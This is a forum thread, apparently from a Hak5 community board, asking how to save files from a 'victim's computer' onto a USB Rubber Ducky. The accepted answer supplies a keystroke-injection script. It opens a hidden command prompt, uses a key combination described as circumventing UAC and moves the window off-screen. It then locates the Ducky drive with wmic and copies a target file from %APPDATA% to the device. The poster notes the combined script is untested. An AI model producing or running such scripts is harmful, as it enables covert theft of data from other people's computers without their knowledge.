Jump to content

[Question] Saving files to the ducky from victims computer


Scurvey
 Share

Go to solution Solved by overwraith,

Recommended Posts

  • Solution

I would probably go to https://github.com/hak5darren/USB-Rubber-Ducky/wiki and get a payload script to start up and hide the command prompt from the payloads page (make sure you have correct encoder):

REM Target: WINDOWS VISTA
REM Encoder V2.4
REM Purpose: Hide cmd window script that uses a key combo to circumvent UAC limitations. 
DELAY 3000
CONTROL ESCAPE
DELAY 500
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
ALT C
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

then I would change directories to %APPDATA%:

STRING cd %APPDATA%
ENTER

Then I would use the popular command for finding a drive labeled ducky on twin duck firmware ducky (Make sure you have installed twin duck firmware) (also, you may have problems here if the ducky mounts slowly, tell me if you have problems):

STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
ENTER

Then I would use the copy command using the variable of the drive determined in the previous bit of code in variable "myd":

STRING copy %APPDATA%\target_file %myd%\
ENTER

When all finished run the exit command to close the conspicuous command prompt:

STRING EXIT
ENTER

Run it a step at a time to make sure everything works, because I haven't tested this code all together yet. The hide command window has been tested, I don't see much that could go wrong.

Edited by overwraith
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...